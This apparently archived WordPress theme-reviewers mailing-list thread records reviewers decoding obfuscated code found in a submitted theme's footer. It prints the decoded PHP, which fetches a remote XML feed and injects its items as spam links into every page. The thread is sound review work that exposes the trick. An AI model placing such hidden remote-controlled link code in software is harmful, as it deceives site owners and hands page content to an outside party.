[theme-reviewers] Can I have another theme to review?

carolina n myazalea at hotmail.com
Sun Apr 10 10:56:42 UTC 2011

No problem,

but could I be assigned a new theme please ;)

From: emil at themeid.com
Date: Sun, 10 Apr 2011 05:09:20 -0500
To: theme-reviewers at lists.wordpress.org
Subject: Re: [theme-reviewers] Can I have another theme to review?

Cool, thanks guys and I must say this is definitely new way of adding in malicious codes in footer area. Back in March Apple released a patch for similar .TIFF malicious code which was affecting  iOS 4.3 http://nakedsecurity.sophos.com/2011/03/10/update-your-apple-devices-to-ios-4-3-or-risk-malicious-code-attacks/

PS Thanks to Carolina as well :)

Time for sleep,
Emil

Emil Uzelac | ThemeID | T: 224-444-0006 | Twitter: @EmilUzelac | E: emil at themeid.com | http://themeid.com
Make everything as simple as possible, but not simpler. - Albert Einstein

On Sun, Apr 10, 2011 at 4:32 AM, Jon Cave <jon at lionsgoroar.co.uk> wrote:

On Sun, Apr 10, 2011 at 10:20 AM, Andrew Nacin <wp at andrewnacin.com> wrote:
> I've closed the ticket and made some preliminary comments. Jon Cave has
> fully decoded it before I've had the chance to -- the end result is loading
> an external XML file to generate as many links as they want in the footer.
> Clever, and slimy as hell.

After doing all sorts of trickery, like reading itself, it finally
decodes itself to the following.

$rss =  simplexml_load_file('http://example.com/paydayfooter/payday.xml');
$title =  $rss->channel->title;
;echo '';
foreach ($rss->channel->item as $item) {
echo "<a href='".$item->link ."'>".$item->title ."</a> - ";

}